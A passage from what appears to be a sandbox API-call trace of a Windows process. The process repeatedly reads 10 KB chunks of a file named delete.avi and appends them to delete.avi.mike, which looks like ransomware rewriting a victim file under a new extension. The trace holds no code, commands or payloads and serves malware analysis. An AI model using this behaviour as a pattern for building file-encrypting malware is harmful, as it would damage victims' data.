lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.746] CloseHandle (hObject=0x264) returned 1 [0044.747] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.747] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.747] GetFileType (hFile=0x264) returned 0x1 [0044.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.747] GetFileType (hFile=0x264) returned 0x1 [0044.747] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xa220 [0044.747] WriteFile (in: hFile=0x264, lpBuffer=0x2157970*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2157970*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.748] CloseHandle (hObject=0x264) returned 1 [0044.748] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.749] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.749] GetFileType (hFile=0x264) returned 0x1 [0044.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.749] GetFileType (hFile=0x264) returned 0x1 [0044.749] SetFilePointer (in: hFile=0x264, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xc800 [0044.749] ReadFile (in: hFile=0x264, lpBuffer=0x215a3b8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x215a3b8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.749] CloseHandle (hObject=0x264) returned 1 [0044.750] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.750] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.750] GetFileType (hFile=0x264) returned 0x1 [0044.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.750] GetFileType (hFile=0x264) returned 0x1 [0044.750] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xca20 [0044.750] WriteFile (in: hFile=0x264, lpBuffer=0x2164920*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2164920*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.750] CloseHandle (hObject=0x264) returned 1 [0044.751] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.751] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.751] GetFileType (hFile=0x264) returned 0x1 [0044.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.752] GetFileType (hFile=0x264) returned 0x1 [0044.752] SetFilePointer (in: hFile=0x264, lDistanceToMove=61440, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xf000 [0044.752] ReadFile (in: hFile=0x264, lpBuffer=0x2167368, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2167368*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.752] CloseHandle (hObject=0x264) returned 1 [0044.752] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.752] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.752] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.753] GetFileType (hFile=0x264) returned 0x1 [0044.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.753] GetFileType (hFile=0x264) returned 0x1 [0044.753] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xf220 [0044.753] WriteFile (in: hFile=0x264, lpBuffer=0x21718d0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21718d0*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.753] CloseHandle (hObject=0x264) returned 1 [0044.754] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.754] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.754] GetFileType (hFile=0x264) returned 0x1 [0044.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.754] GetFileType (hFile=0x264) returned 0x1 [0044.754] SetFilePointer (in: hFile=0x264, lDistanceToMove=71680, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x11800 [0044.754] ReadFile (in: hFile=0x264, lpBuffer=0x2174318, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2174318*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.755] CloseHandle (hObject=0x264) returned 1 [0044.755] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.755] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.755] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.755] GetFileType (hFile=0x264) returned 0x1 [0044.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.755] GetFileType (hFile=0x264) returned 0x1 [0044.756] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x11a20 [0044.756] WriteFile (in: hFile=0x264, lpBuffer=0x217e880*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x217e880*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.756] CloseHandle (hObject=0x264) returned 1 [0044.757] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.757] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.757] GetFileType (hFile=0x264) returned 0x1 [0044.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.757] GetFileType (hFile=0x264) returned 0x1 [0044.757] SetFilePointer (in: hFile=0x264, lDistanceToMove=81920, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x14000 [0044.757] ReadFile (in: hFile=0x264, lpBuffer=0x21812c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21812c8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.757] CloseHandle (hObject=0x264) returned 1 [0044.758] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.758] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.758] GetFileType (hFile=0x264) returned 0x1 [0044.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.758] GetFileType (hFile=0x264) returned 0x1 [0044.758] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x14220 [0044.758] WriteFile (in: hFile=0x264, lpBuffer=0x218b830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x218b830*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.759] CloseHandle (hObject=0x264) returned 1 [0044.760] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.760] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.760] GetFileType (hFile=0x264) returned 0x1 [0044.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.760] GetFileType (hFile=0x264) returned 0x1 [0044.761] SetFilePointer (in: hFile=0x264, lDistanceToMove=92160, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x16800 [0044.761] ReadFile (in: hFile=0x264, lpBuffer=0x218e278, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x218e278*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.761] CloseHandle (hObject=0x264) returned 1 [0044.761] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.761] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.762] GetFileType (hFile=0x264) returned 0x1 [0044.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.762] GetFileType (hFile=0x264) returned 0x1 [0044.762] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x16a20 [0044.762] WriteFile (in: hFile=0x264, lpBuffer=0x21987e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21987e0*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.762] CloseHandle (hObject=0x264) returned 1 [0044.763] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.763] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.763] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.763] GetFileType (hFile=0x264) returned 0x1 [0044.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.763] GetFileType (hFile=0x264) returned 0x1 [0044.764] SetFilePointer (in: hFile=0x264, lDistanceToMove=102400, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x19000 [0044.764] ReadFile (in: hFile=0x264, lpBuffer=0x219b228, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x219b228*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.764] CloseHandle (hObject=0x264) returned 1 [0044.764] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.764] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.765] GetFileType (hFile=0x264) returned 0x1 [0044.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.765] GetFileType (hFile=0x264) returned 0x1 [0044.765] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x19220 [0044.765] WriteFile (in: hFile=0x264, lpBuffer=0x21a5790*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21a5790*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.765] CloseHandle (hObject=0x264) returned 1 [0044.766] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.766] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.766] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.766] GetFileType (hFile=0x264) returned 0x1 [0044.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.766] GetFileType (hFile=0x264) returned 0x1 [0044.767] SetFilePointer (in: hFile=0x264, lDistanceToMove=112640, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x1b800 [0044.767] ReadFile (in: hFile=0x264, lpBuffer=0x21a81d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21a81d8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.767] CloseHandle (hObject=0x264) returned 1 [0044.767] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.767] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.768] GetFileType (hFile=0x264) returned 0x1 [0044.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.768] GetFileType (hFile=0x264) returned 0x1 [0044.768] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x1ba20 [0044.768] WriteFile (in: hFile=0x264, lpBuffer=0x21b2740*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21b2740*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.768] CloseHandle (hObject=0x264) returned 1 [0044.769] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.769] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.769] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.770] GetFileType (hFile=0x264) returned 0x1 [0044.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.770] GetFileType (hFile=0x264) returned 0x1 [0044.770] SetFilePointer (in: hFile=0x264, lDistanceToMove=122880, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x1e000 [0044.770] ReadFile (in: hFile=0x264, lpBuffer=0x21b5188, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21b5188*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.784] CloseHandle (hObject=0x264) returned 1 [0044.785] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.785] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.785] GetFileType (hFile=0x264) returned 0x1 [0044.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.785] GetFileType (hFile=0x264) returned 0x1 [0044.785] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x1e220 [0044.785] WriteFile (in: hFile=0x264, lpBuffer=0x21bf6f0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21bf6f0*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.785] CloseHandle (hObject=0x264) returned 1 [0044.787] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.787] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.787] GetFileType (hFile=0x264) returned 0x1 [0044.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.787] GetFileType (hFile=0x264) returned 0x1 [0044.787] SetFilePointer (in: hFile=0x264, lDistanceToMove=133120, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x20800 [0044.787] ReadFile (in: hFile=0x264, lpBuffer=0x21c2138, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21c2138*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.789] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.789] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.789] GetFileType (hFile=0x264) returned 0x1 [0044.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 